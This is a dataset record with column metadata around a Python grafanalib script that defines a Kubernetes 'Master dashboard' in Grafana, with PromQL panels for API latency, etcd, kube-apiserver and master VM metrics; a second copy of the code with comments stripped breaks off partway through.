hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f70596fbe9596e1848acaad7aac1ea065663307c
| 20,363
|
py
|
Python
|
clusterloader2/pkg/prometheus/manifests/dashboards/master-dashboard.dashboard.py
|
ruquanzhao/perf-tests
|
e63056acb9ae69d2d0bf6449039b0dfda55d129f
|
[
"Apache-2.0"
] | 1
|
2021-06-17T07:19:59.000Z
|
2021-06-17T07:19:59.000Z
|
clusterloader2/pkg/prometheus/manifests/dashboards/master-dashboard.dashboard.py
|
yangjunmyfm192085/perf-tests
|
432229eeb3f74027eab9865ae0eb02078f50238f
|
[
"Apache-2.0"
] | null | null | null |
clusterloader2/pkg/prometheus/manifests/dashboards/master-dashboard.dashboard.py
|
yangjunmyfm192085/perf-tests
|
432229eeb3f74027eab9865ae0eb02078f50238f
|
[
"Apache-2.0"
] | 4
|
2021-01-29T08:31:11.000Z
|
2021-06-14T06:08:32.000Z
|
#!/usr/bin/env python3
# Copyright 2019 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from grafanalib import core as g
import defaults as d
def api_call_latency_panel(expression):
    """Return the standard set of API-call-latency graphs for *expression*.

    *expression* is a PromQL query template containing ``%(verb)s`` and
    ``%(scope)s`` placeholders; one graph is built per (verb, scope,
    threshold) combination, each with a constant "threshold" series drawn
    for visual reference against the SLO.
    """

    def api_call_latency(title, verb, scope, threshold):
        # One graph: the filled-in latency query plus its threshold line.
        return d.Graph(
            title=title,
            targets=[
                g.Target(expr=str(threshold), legendFormat="threshold"),
                g.Target(
                    # Fixed: the closing paren used to sit on the next line.
                    expr=d.one_line(expression % {"verb": verb, "scope": scope}),
                    # TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
                    # legendFormat="{{verb}} {{scope}}/{{resource}}",
                ),
            ],
            yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
        )

    # Titles fixed: "percentaile" -> "percentile".
    return [
        api_call_latency(
            title="GET resource latency (percentile=99, scope=resource, threshold=1s)",
            verb="GET",
            scope="resource",
            threshold=1,
        ),
        api_call_latency(
            title="LIST namespace latency (percentile=99, scope=namespace, threshold=5s)",
            verb="LIST",
            scope="namespace",
            threshold=5,
        ),
        api_call_latency(
            title="LIST cluster latency (percentile=99, scope=cluster, threshold=30s)",
            verb="LIST",
            scope="cluster",
            threshold=30,
        ),
        api_call_latency(
            title="Mutating API call latency (threshold=1s)",
            verb=d.any_of("CREATE", "DELETE", "PATCH", "POST", "PUT"),
            scope=d.any_of("namespace", "cluster", "resource"),
            threshold=1,
        ),
    ]
# Panels built from the precomputed apiserver latency recording rule.
# The %(verb)s / %(scope)s placeholders are substituted inside
# api_call_latency_panel via the "%" operator.
API_CALL_LATENCY_PANELS = api_call_latency_panel("""
apiserver:apiserver_request_latency_1m:histogram_quantile{
quantile="0.99",
verb=~"%(verb)s",
scope=~"%(scope)s",
resource=~"${resource:regex}s*",
subresource!~"exec|proxy",
}""")
# Same panels, but additionally aggregated with quantile_over_time across
# a 5-day window (worst 1% of the per-minute quantiles).
QUANTILE_API_CALL_LATENCY_PANELS = api_call_latency_panel("""
quantile_over_time(0.99,
apiserver:apiserver_request_latency_1m:histogram_quantile{
quantile="0.99",
verb=~"%(verb)s",
scope=~"%(scope)s",
resource=~"${resource:regex}s*",
subresource!~"exec|proxy",
}[5d])""")
# API Priority & Fairness (flow control) panels, one series per priority_level.
PAF_PANELS = [
    d.simple_graph(
        "Requests waiting time",
        "histogram_quantile(0.99, sum(rate(apiserver_flowcontrol_request_wait_duration_seconds_bucket[1m])) by (le, priority_level))",
        legend="{{priority_level}}",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    d.simple_graph(
        "Execution time",
        "histogram_quantile(0.99, sum(rate(apiserver_flowcontrol_request_execution_seconds_bucket[1m])) by (le, priority_level))",
        legend="{{priority_level}}",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    d.simple_graph(
        "Total execution time per second",
        "sum(irate(apiserver_flowcontrol_request_execution_seconds_sum[1m])) by (priority_level)",
        legend="{{priority_level}}",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    d.simple_graph(
        "Requests rate by priority level",
        "sum(irate(apiserver_flowcontrol_dispatched_requests_total[1m])) by (priority_level)",
        legend="{{priority_level}}",
        yAxes=g.single_y_axis(format=g.OPS_FORMAT),
    ),
    d.simple_graph(
        "Concurrency limits",
        "avg(apiserver_flowcontrol_request_concurrency_limit) by (priority_level)",
        legend="{{priority_level}}",
    ),
]
# Cluster-health overview: node health, pod churn, control-plane restarts
# and leader election status.
HEALTH_PANELS = [
    d.simple_graph(
        "Unhealthy nodes",
        "sum(node_collector_unhealthy_nodes_in_zone) by (zone)",
        legend="{{zone}}",
    ),
    d.simple_graph(
        "Pod creations",
        'sum(irate(apiserver_request_total{verb="POST", resource="pods", subresource=""}[1m]))',
        yAxes=g.single_y_axis(format=g.OPS_FORMAT),
    ),
    d.simple_graph(
        "Pod bindings",
        'sum(irate(apiserver_request_total{verb="POST", resource="pods", subresource="binding"}[1m]))',
        yAxes=g.single_y_axis(format=g.OPS_FORMAT),
    ),
    # It's not clear which "Component restarts" shows more accurate results.
    d.simple_graph(
        "Component restarts",
        "sum(rate(process_start_time_seconds[1m]) > bool 0) by (job, endpoint)",
    ),
    d.simple_graph(
        "Component restarts 2",
        'sum(min_over_time(container_start_time_seconds{container!="",container!="POD"}[2m])) by (container)',
    ),
    d.simple_graph(
        "Active component", "sum(leader_election_master_status) by (name, instance)"
    ),
]
# etcd panels: leadership, request rates/latencies, compaction behaviour,
# commit/fsync durations, object counts and database size.
# ${etcd_operation:regex} and ${etcd_type:pipe} are dashboard templating
# variables defined at the bottom of this file.
ETCD_PANELS = [
    d.simple_graph("etcd leader", "etcd_server_is_leader", legend="{{instance}}"),
    d.simple_graph(
        "etcd bytes sent",
        "rate(etcd_network_client_grpc_sent_bytes_total[1m])",
        yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
        legend="{{instance}}",
    ),
    d.simple_graph(
        "etcd operations rate",
        d.one_line(
            """
sum(
rate(
etcd_request_duration_seconds_count{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (operation, type)
"""
        ),
        yAxes=g.single_y_axis(format=g.OPS_FORMAT),
        legend="{{operation}} {{type}}",
    ),
    d.simple_graph(
        "etcd get latency by type (99th percentile)",
        d.one_line(
            """
histogram_quantile(
0.99,
sum(
rate(
etcd_request_duration_seconds_bucket{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (le, operation, type, instance)
)
"""
        ),
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
        legend="{{operation}} {{type}} on {{instance}}",
    ),
    d.simple_graph(
        "etcd get latency by type (50th percentile)",
        d.one_line(
            """
histogram_quantile(
0.50,
sum(
rate(
etcd_request_duration_seconds_bucket{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (le, operation, type, instance)
)
"""
        ),
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    d.simple_graph("etcd instance id", "sum(etcd_server_id) by (instance, server_id)"),
    d.simple_graph(
        "etcd network latency (99th percentile)",
        "histogram_quantile(0.99, sum(rate(etcd_network_peer_round_trip_time_seconds_bucket[1m])) by (le, instance, To))",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    d.simple_graph(
        "etcd compaction keys",
        "delta(etcd_debugging_mvcc_db_compaction_keys_total[1m])",
    ),
    d.simple_graph(
        "etcd compaction pause sum duration",
        "delta(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_sum[1m])",
        yAxes=g.single_y_axis(format=g.MILLISECONDS_FORMAT),
    ),
    d.simple_graph(
        "etcd compaction pause num chunks",
        "delta(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_count[1m])",
    ),
    d.simple_graph(
        "etcd_disk_backend_commit_duration_seconds",
        "histogram_quantile(0.99, sum(rate(etcd_disk_backend_commit_duration_seconds_bucket[1m])) by (le, instance))",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    d.simple_graph(
        "etcd wal fsync duration",
        "histogram_quantile(1.0, sum(rate(etcd_disk_wal_fsync_duration_seconds_bucket[1m])) by (le, endpoint))",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    # Drawn as points (no lines); quantile 1.0 gives the observed maximum.
    d.Graph(
        title="etcd compaction max pause",
        points=True,
        lines=False,
        targets=[
            g.Target(
                expr="histogram_quantile(1.0, sum(rate(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_bucket[1m])) by (le, instance))"
            )
        ],
        yAxes=g.single_y_axis(format=g.MILLISECONDS_FORMAT),
    ),
    d.simple_graph(
        "etcd objects",
        "sum(etcd_object_counts) by (resource, instance)",
        legend="{{instance}}: {{resource}}",
    ),
    # Passing a list of expressions — presumably one series per expression;
    # see defaults.simple_graph for the exact handling.
    d.simple_graph(
        "etcd db size",
        [
            "etcd_mvcc_db_total_size_in_bytes",
            "etcd_mvcc_db_total_size_in_use_in_bytes",
            "etcd_server_quota_backend_bytes",
        ],
        yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
    ),
]
# kube-apiserver internals: Go runtime stats, watch activity, request
# rates/latencies, and admission/filter latencies. ${verb:regex} and
# ${resource:regex} are dashboard templating variables (bottom of file).
# NOTE(review): the trailing "s*" after ${resource:regex} appears to
# re-allow an optional plural "s" stripped by the "resource" template's
# regex — confirm before changing.
APISERVER_PANELS = [
    d.simple_graph(
        "goroutines",
        'go_goroutines{job="master", endpoint="apiserver"}',
        legend="{{instance}}",
    ),
    d.simple_graph(
        "gc rate",
        'rate(go_gc_duration_seconds_count{job="master", endpoint="apiserver"}[1m])',
        legend="{{instance}}",
    ),
    d.simple_graph(
        "alloc rate",
        'rate(go_memstats_alloc_bytes_total{job="master", endpoint="apiserver"}[1m])',
        yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
        legend="{{instance}}",
    ),
    d.simple_graph(
        "Number of active watches",
        'sum(apiserver_registered_watchers{kind=~"(?i:(${resource:regex}))s*"}) by (instance, group, version, kind)',
        legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
    ),
    d.simple_graph(
        "Watch events rate",
        d.one_line(
            """
sum(
irate(
apiserver_watch_events_total{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
        ),
        legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
    ),
    d.simple_graph(
        "Watch events traffic",
        d.one_line(
            """
sum(
irate(
apiserver_watch_events_sizes_sum{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
        ),
        yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
        legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
    ),
    # Average event size = bytes/sec divided by events/sec.
    d.simple_graph(
        "Watch event avg size",
        d.one_line(
            """
sum(
rate(
apiserver_watch_events_sizes_sum{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
/
rate(
apiserver_watch_events_sizes_count{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
        ),
        legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
    ),
    d.simple_graph(
        "Inflight requests",
        "sum(apiserver_current_inflight_requests) by (requestKind, instance)",
        legend="{{instance}}: {{requestKind}}",
    ),
    d.simple_graph(
        "Request rate",
        d.one_line(
            """
sum(
rate(
apiserver_request_total{
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}[1m]
)
) by (verb, resource, subresource, instance)"""
        ),
        # TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
        # legend="{{instance}}: {{verb}} {{resource}}",
    ),
    d.simple_graph(
        "Request rate by code",
        "sum(rate(apiserver_request_total[1m])) by (code, instance)",
        legend="{{instance}}: {{code}}",
    ),
    d.simple_graph(
        "Request latency (50th percentile) (excl. WATCH)",
        d.one_line(
            """
apiserver:apiserver_request_latency:histogram_quantile{
quantile="0.50",
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}"""
        ),
        # TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
        # legend="{{verb}} {{scope}}/{{resource}}",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    d.simple_graph(
        "Request latency (99th percentile) (excl. WATCH)",
        d.one_line(
            """
apiserver:apiserver_request_latency:histogram_quantile{
quantile="0.99",
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}"""
        ),
        # TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
        # legend="{{verb}} {{scope}}/{{resource}}",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    d.simple_graph(
        "Traffic (excl. WATCH)",
        d.one_line(
            """
sum(
rate(
apiserver_response_sizes_sum{
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}[1m]
)
) by (verb, version, resource, subresource, scope, instance)"""
        ),
        yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
    ),
    d.simple_graph(
        "Webhook admission duration (99th percentile)",
        "histogram_quantile(0.99, sum(rate(apiserver_admission_webhook_admission_duration_seconds_bucket[1m])) by (le, type, name))",
        legend="{{type}}: {{name}}",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
    d.simple_graph(
        "Request filter latency for each filter type (99th percentile)",
        "histogram_quantile(0.99, sum(rate(apiserver_request_filter_duration_seconds_bucket[1m])) by (le, filter))",
        legend="{{filter}}",
        yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
    ),
]
# Master VM resource usage (cadvisor / node-exporter metrics): filesystem,
# CPU, memory and network.
VM_PANELS = [
    d.simple_graph(
        "fs bytes reads by container",
        "sum(rate(container_fs_reads_bytes_total[1m])) by (container, instance)",
        legend="{{instance}}: {{container}}",
        # NOTE(review): this plots a rate, so BYTES_PER_SEC_FORMAT would seem
        # more accurate than BYTES_FORMAT — confirm before changing.
        yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
    ),
    d.simple_graph(
        "fs reads by container",
        "sum(rate(container_fs_reads_total[1m])) by (container, instance)",
        legend="{{instance}}: {{container}}",
    ),
    d.simple_graph(
        "fs bytes writes by container",
        "sum(rate(container_fs_writes_bytes_total[1m])) by (container, instance)",
        legend="{{instance}}: {{container}}",
        yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
    ),
    d.simple_graph(
        "fs writes by container",
        "sum(rate(container_fs_writes_total[1m])) by (container, instance)",
        legend="{{instance}}: {{container}}",
    ),
    # NOTE(review): the next three panels use d.Target where others use
    # g.Target — presumably defaults re-exports/wraps Target; confirm.
    d.Graph(
        title="CPU usage by container",
        targets=[
            d.Target(
                expr='sum(rate(container_cpu_usage_seconds_total{container!=""}[1m])) by (container, instance)',
                legendFormat="{{instance}}: {{container}}",
            ),
            # Machine capacity drawn as the "limit" series.
            d.Target(expr="machine_cpu_cores", legendFormat="limit"),
        ],
    ),
    d.Graph(
        title="memory usage by container",
        targets=[
            d.Target(
                expr='sum(container_memory_usage_bytes{container!=""}) by (container, instance)',
                legendFormat="{{instance}}: {{container}}",
            ),
            d.Target(expr="machine_memory_bytes", legendFormat="limit"),
        ],
        yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
    ),
    d.Graph(
        title="memory working set by container",
        targets=[
            d.Target(
                expr='sum(container_memory_working_set_bytes{container!=""}) by (container, instance)',
                legendFormat="{{instance}}: {{container}}",
            ),
            d.Target(expr="machine_memory_bytes", legendFormat="limit"),
        ],
        yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
    ),
    # id="/" selects the root cgroup, i.e. whole-machine network usage.
    d.Graph(
        title="Network usage (bytes)",
        targets=[
            g.Target(
                expr='rate(container_network_transmit_bytes_total{id="/"}[1m])',
                legendFormat="{{instance}} transmit",
            ),
            g.Target(
                expr='rate(container_network_receive_bytes_total{id="/"}[1m])',
                legendFormat="{{instance}} receive",
            ),
        ],
        yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
    ),
    d.Graph(
        title="Network usage (packets)",
        targets=[
            g.Target(
                expr='rate(container_network_transmit_packets_total{id="/"}[1m])',
                legendFormat="{{instance}} transmit",
            ),
            g.Target(
                expr='rate(container_network_receive_packets_total{id="/"}[1m])',
                legendFormat="{{instance}} receive",
            ),
        ],
    ),
    # bytes/sec divided by packets/sec = average packet size.
    d.Graph(
        title="Network usage (avg packet size)",
        targets=[
            g.Target(
                expr='rate(container_network_transmit_bytes_total{id="/"}[1m]) / rate(container_network_transmit_packets_total{id="/"}[1m])',
                legendFormat="{{instance}} transmit",
            ),
            g.Target(
                expr='rate(container_network_receive_bytes_total{id="/"}[1m]) / rate(container_network_receive_packets_total{id="/"}[1m])',
                legendFormat="{{instance}} receive",
            ),
        ],
        yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
    ),
    # Log scale: retransmits are orders of magnitude rarer than in/out segments.
    d.Graph(
        title="Network tcp segments",
        targets=[
            g.Target(
                expr="sum(rate(node_netstat_Tcp_InSegs[1m])) by (instance)",
                legendFormat="InSegs {{instance}}",
            ),
            g.Target(
                expr="sum(rate(node_netstat_Tcp_OutSegs[1m])) by (instance)",
                legendFormat="OutSegs {{instance}}",
            ),
            g.Target(
                expr="sum(rate(node_netstat_Tcp_RetransSegs[1m])) by (instance)",
                legendFormat="RetransSegs {{instance}}",
            ),
        ],
        yAxes=g.single_y_axis(format=g.SHORT_FORMAT, logBase=10),
    ),
]
# The final dashboard must be named 'dashboard' so that grafanalib will find it.
dashboard = d.Dashboard(
    title="Master dashboard",
    refresh="",
    # All rows except the headline latency row start collapsed.
    rows=[
        d.Row(title="API call latency", panels=API_CALL_LATENCY_PANELS),
        d.Row(title="API call latency aggregated with quantile", panels=QUANTILE_API_CALL_LATENCY_PANELS, collapse=True),
        d.Row(title="P&F metrics", panels=PAF_PANELS, collapse=True),
        d.Row(title="Overall cluster health", panels=HEALTH_PANELS, collapse=True),
        d.Row(title="etcd", panels=ETCD_PANELS, collapse=True),
        d.Row(title="kube-apiserver", panels=APISERVER_PANELS, collapse=True),
        d.Row(
            title="kube-controller-manager",
            panels=[
                d.simple_graph(
                    "Workqueue depths",
                    'workqueue_depth{endpoint="kube-controller-manager"}',
                    legend="{{name}}",
                )
            ],
            collapse=True,
        ),
        d.Row(title="Master VM", panels=VM_PANELS, collapse=True),
    ],
    # Dashboard variables ($source, $etcd_type, $etcd_operation, $verb,
    # $resource) referenced by the panel expressions above.
    templating=g.Templating(
        list=[
            d.SOURCE_TEMPLATE,
            g.Template(
                name="etcd_type",
                type="query",
                dataSource="$source",
                # Presumably strips a "*[...]" prefix from the raw label
                # values — confirm against actual etcd type labels.
                regex=r"\*\[+\]+(.*)",
                query="label_values(etcd_request_duration_seconds_count, type)",
                multi=True,
                includeAll=True,
                refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
            ),
            g.Template(
                name="etcd_operation",
                type="query",
                dataSource="$source",
                query="label_values(etcd_request_duration_seconds_count, operation)",
                multi=True,
                includeAll=True,
                refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
            ),
            g.Template(
                name="verb",
                type="query",
                dataSource="$source",
                query="label_values(apiserver_request_duration_seconds_count, verb)",
                multi=True,
                includeAll=True,
                refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
            ),
            g.Template(
                name="resource",
                type="query",
                dataSource="$source",
                # Captures the name minus a trailing "s"; panel queries match
                # with a trailing "s*" — presumably to cover plural forms.
                regex="(.*)s",
                query="label_values(apiserver_request_duration_seconds_count, resource)",
                multi=True,
                includeAll=True,
                refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
            ),
        ]
    ),
).auto_panel_ids()
| 33.60231
| 149
| 0.582282
|
from grafanalib import core as g
import defaults as d
def api_call_latency_panel(expression):
def api_call_latency(title, verb, scope, threshold):
return d.Graph(
title=title,
targets=[
g.Target(expr=str(threshold), legendFormat="threshold"),
g.Target(
expr=d.one_line(expression % {"verb": verb, "scope": scope}
),
),
],
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
)
return [
api_call_latency(
title="GET resource latency (percentaile=99, scope=resource, threshold=1s)",
verb="GET",
scope="resource",
threshold=1,
),
api_call_latency(
title="LIST namespace latency (percentaile=99, scope=namespace, threshold=5s)",
verb="LIST",
scope="namespace",
threshold=5,
),
api_call_latency(
title="LIST cluster latency (percentaile=99, scope=cluster, threshold=30s)",
verb="LIST",
scope="cluster",
threshold=30,
),
api_call_latency(
title="Mutating API call latency (threshold=1s)",
verb=d.any_of("CREATE", "DELETE", "PATCH", "POST", "PUT"),
scope=d.any_of("namespace", "cluster", "resource"),
threshold=1,
),
]
API_CALL_LATENCY_PANELS = api_call_latency_panel("""
apiserver:apiserver_request_latency_1m:histogram_quantile{
quantile="0.99",
verb=~"%(verb)s",
scope=~"%(scope)s",
resource=~"${resource:regex}s*",
subresource!~"exec|proxy",
}""")
QUANTILE_API_CALL_LATENCY_PANELS = api_call_latency_panel("""
quantile_over_time(0.99,
apiserver:apiserver_request_latency_1m:histogram_quantile{
quantile="0.99",
verb=~"%(verb)s",
scope=~"%(scope)s",
resource=~"${resource:regex}s*",
subresource!~"exec|proxy",
}[5d])""")
PAF_PANELS = [
d.simple_graph(
"Requests waiting time",
"histogram_quantile(0.99, sum(rate(apiserver_flowcontrol_request_wait_duration_seconds_bucket[1m])) by (le, priority_level))",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Execution time",
"histogram_quantile(0.99, sum(rate(apiserver_flowcontrol_request_execution_seconds_bucket[1m])) by (le, priority_level))",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Total execution time per second",
"sum(irate(apiserver_flowcontrol_request_execution_seconds_sum[1m])) by (priority_level)",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Requests rate by priority level",
"sum(irate(apiserver_flowcontrol_dispatched_requests_total[1m])) by (priority_level)",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
),
d.simple_graph(
"Concurrency limits",
"avg(apiserver_flowcontrol_request_concurrency_limit) by (priority_level)",
legend="{{priority_level}}",
),
]
HEALTH_PANELS = [
d.simple_graph(
"Unhealthy nodes",
"sum(node_collector_unhealthy_nodes_in_zone) by (zone)",
legend="{{zone}}",
),
d.simple_graph(
"Pod creations",
'sum(irate(apiserver_request_total{verb="POST", resource="pods", subresource=""}[1m]))',
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
),
d.simple_graph(
"Pod bindings",
'sum(irate(apiserver_request_total{verb="POST", resource="pods", subresource="binding"}[1m]))',
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
),
d.simple_graph(
"Component restarts",
"sum(rate(process_start_time_seconds[1m]) > bool 0) by (job, endpoint)",
),
d.simple_graph(
"Component restarts 2",
'sum(min_over_time(container_start_time_seconds{container!="",container!="POD"}[2m])) by (container)',
),
d.simple_graph(
"Active component", "sum(leader_election_master_status) by (name, instance)"
),
]
ETCD_PANELS = [
d.simple_graph("etcd leader", "etcd_server_is_leader", legend="{{instance}}"),
d.simple_graph(
"etcd bytes sent",
"rate(etcd_network_client_grpc_sent_bytes_total[1m])",
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
legend="{{instance}}",
),
d.simple_graph(
"etcd operations rate",
d.one_line(
"""
sum(
rate(
etcd_request_duration_seconds_count{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (operation, type)
"""
),
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
legend="{{operation}} {{type}}",
),
d.simple_graph(
"etcd get latency by type (99th percentile)",
d.one_line(
"""
histogram_quantile(
0.99,
sum(
rate(
etcd_request_duration_seconds_bucket{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (le, operation, type, instance)
)
"""
),
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
legend="{{operation}} {{type}} on {{instance}}",
),
d.simple_graph(
"etcd get latency by type (50th percentile)",
d.one_line(
"""
histogram_quantile(
0.50,
sum(
rate(
etcd_request_duration_seconds_bucket{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (le, operation, type, instance)
)
"""
),
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph("etcd instance id", "sum(etcd_server_id) by (instance, server_id)"),
d.simple_graph(
"etcd network latency (99th percentile)",
"histogram_quantile(0.99, sum(rate(etcd_network_peer_round_trip_time_seconds_bucket[1m])) by (le, instance, To))",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"etcd compaction keys",
"delta(etcd_debugging_mvcc_db_compaction_keys_total[1m])",
),
d.simple_graph(
"etcd compaction pause sum duration",
"delta(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_sum[1m])",
yAxes=g.single_y_axis(format=g.MILLISECONDS_FORMAT),
),
d.simple_graph(
"etcd compaction pause num chunks",
"delta(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_count[1m])",
),
d.simple_graph(
"etcd_disk_backend_commit_duration_seconds",
"histogram_quantile(0.99, sum(rate(etcd_disk_backend_commit_duration_seconds_bucket[1m])) by (le, instance))",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"etcd wal fsync duration",
"histogram_quantile(1.0, sum(rate(etcd_disk_wal_fsync_duration_seconds_bucket[1m])) by (le, endpoint))",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.Graph(
title="etcd compaction max pause",
points=True,
lines=False,
targets=[
g.Target(
expr="histogram_quantile(1.0, sum(rate(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_bucket[1m])) by (le, instance))"
)
],
yAxes=g.single_y_axis(format=g.MILLISECONDS_FORMAT),
),
d.simple_graph(
"etcd objects",
"sum(etcd_object_counts) by (resource, instance)",
legend="{{instance}}: {{resource}}",
),
d.simple_graph(
"etcd db size",
[
"etcd_mvcc_db_total_size_in_bytes",
"etcd_mvcc_db_total_size_in_use_in_bytes",
"etcd_server_quota_backend_bytes",
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
]
APISERVER_PANELS = [
d.simple_graph(
"goroutines",
'go_goroutines{job="master", endpoint="apiserver"}',
legend="{{instance}}",
),
d.simple_graph(
"gc rate",
'rate(go_gc_duration_seconds_count{job="master", endpoint="apiserver"}[1m])',
legend="{{instance}}",
),
d.simple_graph(
"alloc rate",
'rate(go_memstats_alloc_bytes_total{job="master", endpoint="apiserver"}[1m])',
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
legend="{{instance}}",
),
d.simple_graph(
"Number of active watches",
'sum(apiserver_registered_watchers{kind=~"(?i:(${resource:regex}))s*"}) by (instance, group, version, kind)',
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Watch events rate",
d.one_line(
"""
sum(
irate(
apiserver_watch_events_total{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
),
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Watch events traffic",
d.one_line(
"""
sum(
irate(
apiserver_watch_events_sizes_sum{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
),
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
